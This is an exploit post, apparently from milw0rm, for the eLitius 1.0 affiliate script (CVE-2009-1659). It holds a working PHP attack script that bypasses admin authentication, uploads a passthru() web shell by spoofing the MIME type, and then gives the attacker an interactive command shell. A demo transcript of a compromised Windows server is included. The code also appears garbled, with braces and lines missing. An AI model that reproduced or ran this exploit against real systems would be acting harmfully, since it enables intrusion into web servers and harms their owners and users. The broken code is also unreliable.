eLitius 1.0 - Remote Command Execution

Related Vulnerabilities: CVE-2009-1659  
Publish Date: 04 May 2009
Author: G4N0K
                      _      _       _          _      _   _ 
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|

                      ____   _  _     _   _    ___    _  __
                     / ___| | || |   | \ | |  / _ \  | |/ /
                    | |  _  | || |_  |  \| | | | | | | ' / 
                    | |_| | |__   _| | |\  | | |_| | | . \ 
                     \____|    |_|   |_| \_|  \___/  |_|\_\ I'm From Iran...

	eLitius v1.0 Remote Command Execution Exploit

	[ª] Script:.............[ eLitius v1.0 ]..............................
	[ª] Website:............[ http://www.elitius.com/ ]...................
	[ª] Today:..............[ 30042009 ]..................................
	[ª] Founder:............[ G4N0K | mail[o]ganok[sh!t]gmail.com ].......

	[!] What is going on...
	00. Auth Bypass...
	01. Arbitrary File upload (MIME-Type Spoofing)...

    [+] demo...
	xpl.php /eLitius_v_1_0/
        |        eLitius v1.0 Remote Command Execution Exploit        |
        |              by: G4N0K | mail[o]ganok[ta]com                |
        |             Thanks: ALLAH, MSD, SMN, AMD, AFN               |

    [+] Trying to exploit

    [+] File has been uploaded...

    [+] Now you can exec your commands...

php-shell@ dir
 Volume in drive E has no label.
 Volume Serial Number is 042D-D300

 Directory of E:\www\eLitius_v_1_0\admin\banners

09/09/2009  03:01 AM    <DIR>          .
09/09/2009  03:01 AM    <DIR>          ..
09/09/2009  07:58 PM           104,747 1.gif
09/09/2009  03:01 AM                89 banner_ditails.php
09/09/2009  07:58 PM           104,747 DEH-P9800BT remote control.gif
09/09/2009  08:33 AM            19,638 sponimage.php.gif
               4 File(s)        232,681 bytes
               2 Dir(s)     125,026,304 bytes free
php-shell@ exit


if (php_sapi_name() <> "cli") {
	die("WTF, Run Me From CommandLine...");
if ($argc <> 3){__nfo();__usg();exit;}
$hst = $argv[1];
$pth = $argv[2];

function __snd($hst, $pkt)
	$socket = fsockopen($hst, 80, $errno, $errstr, 30);
	if (!$socket) {
		echo "\r\n    [+] Socket err#: $errstr ($errno)\n\r";exit;
	} else {
		fwrite($socket, $pkt);
		while (!feof($socket)) {
			$g4n0k.=fgets($socket, 2048);
		return $g4n0k;

function __srch($wt){
	$pos = strpos($wt, 'gnkgnkgnk');
	$pos_end = strrpos($wt, 'gnkgnkgnk');
	if (!$pos && !$pos_end){echo " [!] error...\r\n";}
	$rest = substr($wt, $pos+9, ($pos_end - ($pos+9)));
	return $rest;

function __nfo()
$ganok = <<<EOL
        |        eLitius v1.0 Remote Command Execution Exploit        |
        |              by: G4N0K | mail[o]ganok[ta]com                |
        |             Thanks: ALLAH, MSD, SMN, AMD, AFN               |
print $ganok;

function __usg()
echo <<<GNK
		  xpl.php host path
		  xpl.php /eLitius_v_1_0/

$joke = '-----------------------------3902153292
Content-Disposition: form-data; name="userfile"; filename="banner_ditails.php"
Content-Type: image/gif

<?php error_reporting(0);print("gnkgnkgnk");passthru($_GET["gnk"]);print("gnkgnkgnk"); ?>
Content-Disposition: form-data; name="fileupload"

Content-Disposition: form-data; name="directory"


$msd_pyld  = "POST {$pth}admin/uploadimage.php HTTP/1.1\r\n";
$msd_pyld .= "Host: {$hst}\r\n";
$msd_pyld .= "Keep-Alive: 300\n\r";
$msd_pyld .= "Connection: keep-alive\r\n";
$msd_pyld .= "Content-Length: ".strlen($joke)."\r\n";
$msd_pyld .= "Content-Type: multipart/form-data; boundary=---------------------------3902153292\r\n\r\n";
$msd_pyld .= $joke;

echo "\r\n    [+] Trying to exploit {$hst}...\n\r";
if (stristr(__snd($hst, $msd_pyld), "uploaded")){
	echo "\r\n    [+] File has been uploaded...\n\r\r\n    [+] Now you can exec your commands...\r\n"; } else {
	echo "\r\n    [+] Oops!, Upload failed.\n\r"; exit;

	echo "\r\nphp-shell@{$hst}# ";
	if (($cmd = str_replace (" ", "%20", trim(fgets(STDIN)))) == "exit") exit;
	$smn_pyld  = "GET {$pth}admin/banners/banner_ditails.php?gnk=".$cmd." HTTP/1.1\r\n";
	$smn_pyld .= "Host: {$hst}\r\n";
	$smn_pyld .= "Connection: close\n\r\n\r";
	print __srch(__snd($hst, $smn_pyld));


# milw0rm.com [2009-05-04]